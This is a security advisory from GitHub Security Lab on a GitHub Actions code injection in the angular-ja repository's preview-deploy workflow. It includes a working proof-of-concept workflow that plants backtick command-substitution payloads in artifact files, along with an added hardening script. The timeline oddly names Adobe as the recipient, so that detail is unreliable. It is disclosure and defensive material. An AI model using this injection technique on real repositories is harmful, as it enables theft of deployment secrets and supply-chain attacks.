Coordinated Disclosure Timeline
- 2024-10-04: Report through HackerOne Bug Bounty Program.
- 2024-10-05: PoC recording on a repository copy sent to Adobe.
- 2024-10-14: Vulnerability remediated by disabling the workflow.
Summary
The angular/angular-ja repository is vulnerable to a code injection in its adev-preview-deploy.yml workflow, which may allow an attacker to gain write permissions for the pull_request scope and to leak the Firebase token.
Project
Angular JA
Tested Version
Latest commit at the time of reporting
Details
Code Injection in adev-preview-deploy.yml workflow (GHSL-2024-338)
The adev-preview-deploy.yml workflow is triggered whenever a run of the Build adev for preview deployment workflow completes:
```yaml
on:
  workflow_run:
    workflows: ['Build adev for preview deployment']
    types: [completed]
```
An attacker can open a Pull Request against the repository that modifies adev-preview-build.yml so that, when the pull request is created, artifacts with attacker-controlled content are uploaded. Because adev-preview-build.yml runs on the pull_request event, the PR's version of that workflow executes and uploads the malicious artifacts; its completion then triggers the vulnerable adev-preview-deploy.yml workflow, which downloads the artifacts and interpolates their contents into a shell script:
```yaml
- name: Download adev preview artifact from previous workflow run
  uses: actions/download-artifact@v4
  with:
    name: adev-preview
    path: ${{ env.BUILD_DIR }}
    github-token: '${{secrets.GITHUB_TOKEN}}'
    run-id: ${{ github.event.workflow_run.id }}
...
- name: Extract pull request number
  id: pr-number
  run: |
    PR_NUMBER=$(cat ./$BUILD_DIR/__metadata__pull_number.txt)
    echo "value=$PR_NUMBER" >> $GITHUB_OUTPUT
- name: Extract commit hash
  ...
- run: echo ${{ steps.pr-number.outputs.value }} ${{ steps.commit-hash.outputs.value }}
```
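One way to harden the two extraction steps above, as an added example rather than the angular-ja project's own code: the artifact comes from a pull_request run of a workflow the PR author can rewrite, so its files are untrusted input and must be validated against a strict shape before anything is written to GITHUB_OUTPUT. The function names, the file layout and the sample artifacts below are assumptions made for the demonstration.

```shell
# Added example, not part of the GHSL advisory or the angular-ja workflows: a
# hardened replacement for the "Extract pull request number" / "Extract commit
# hash" steps. The artifact is produced by a pull_request run of a workflow the
# PR author can edit, so its contents are untrusted input. Each value is
# validated before it is written to GITHUB_OUTPUT, and a malformed artifact
# fails the job instead of reaching a shell script.
# Function names, file names and the sample artifacts are assumptions.

# validate_metadata DIR
# Prints "pr=<number> sha=<hash>" and returns 0 when both metadata files in DIR
# are well formed; returns 1 (printing nothing) otherwise.
validate_metadata() {
  dir="$1"
  # Read at most 64 bytes and strip line endings; a legitimate value is far shorter.
  pr=$(head -c 64 "$dir/__metadata__pull_number.txt" 2>/dev/null | tr -d '\r\n')
  sha=$(head -c 64 "$dir/__metadata__commit_hash.txt" 2>/dev/null | tr -d '\r\n')
  # Pull request number: 1 to 10 decimal digits, nothing else.
  case "$pr" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "${#pr}" -le 10 ] || return 1
  # Commit hash: exactly 40 lowercase hex digits.
  case "$sha" in
    *[!0-9a-f]*) return 1 ;;
  esac
  [ "${#sha}" -eq 40 ] || return 1
  printf 'pr=%s sha=%s\n' "$pr" "$sha"
}

# write_outputs DIR OUTPUT_FILE
# Appends pr-number=... and commit-hash=... to OUTPUT_FILE (GITHUB_OUTPUT in CI).
# Fails closed: a malformed artifact produces no outputs and a non-zero status.
write_outputs() {
  dir="$1"; out="$2"
  result=$(validate_metadata "$dir") || {
    echo "refusing to use metadata from untrusted artifact in $dir" >&2
    return 1
  }
  pr=${result%% *}; pr=${pr#pr=}
  sha=${result##* }; sha=${sha#sha=}
  printf 'pr-number=%s\ncommit-hash=%s\n' "$pr" "$sha" >> "$out"
}

# Constructed sample artifacts: one benign, one carrying a command-substitution
# payload of the kind the PoC uses. Both are written locally; nothing is fetched.
demo() {
  tmp="$1"
  mkdir -p "$tmp/good" "$tmp/bad"
  printf '123\n' > "$tmp/good/__metadata__pull_number.txt"
  printf 'deadbeefdeadbeefdeadbeefdeadbeefdeadbeef\n' > "$tmp/good/__metadata__commit_hash.txt"
  printf '`whoami`\n' > "$tmp/bad/__metadata__pull_number.txt"
  printf '$(whoami)\n' > "$tmp/bad/__metadata__commit_hash.txt"
  for name in good bad; do
    if write_outputs "$tmp/$name" "$tmp/$name.out"; then
      echo "$name: accepted -> $(tr '\n' ' ' < "$tmp/$name.out")"
    else
      echo "$name: rejected"
    fi
  done
}

demo "$(mktemp -d)"
```

Validation is only half of the fix. The final step should also receive the values through env: (for example env: PR_NUMBER: ${{ steps.pr-number.outputs.value }} followed by run: echo "$PR_NUMBER") so that they are never expanded into the script text, and the workflow_run job should hold the pull-requests: write permission and the Firebase secret only in the steps that actually need them.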
Impact
Since the vulnerable workflow runs with pull-requests: write permissions, an attacker will be able to modify any Pull Request. Moreover, an attacker will also get access to the FIREBASE_SERVICE_ACCOUNT secret, which will allow them to deploy arbitrary code to Firebase. An attacker could use this token to poison the angular.jp site, add links to malicious artifacts, etc.
PoC
- Fork angular/angular-ja
- Create a new git branch: git checkout -b test
- Modify adev-preview-build.yml so that its code is:
```yaml
name: Build adev for preview deployment
on:
  pull_request:
jobs:
  adev-build:
    runs-on: ubuntu-latest
    steps:
      - name: Inject pull request number
        run: echo '`whoami`' >> __metadata__pull_number.txt
      - name: Inject commit hash
        run: echo '`whoami`' >> __metadata__commit_hash.txt
      - uses: actions/upload-artifact@v4
        with:
          name: adev-preview
          path: .
```
- Commit the changes: git add . ; git commit -m "add payload"
- Create a Pull Request against angular/angular-ja: gh pr create (follow the prompts)
- Go to the angular/angular-ja GitHub repo and navigate to the Actions tab. Wait for the preview deploy action to complete and observe the output of the
- run: echo ${{ steps.pr-number.outputs.value }} ${{ steps.commit-hash.outputs.value }}
step, which should be:
runner runner
This is just a PoC to prove code execution. Since FIREBASE_SERVICE_ACCOUNT is passed to the runner, an attacker could easily steal it and use it to deploy arbitrary content to angular.jp, which could be used to attack developers or as part of a supply chain attack.
Credit
This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).
Contact
You can contact the GHSL team at securitylab@github.com; please include a reference to GHSL-2024-338 in any communication regarding this issue.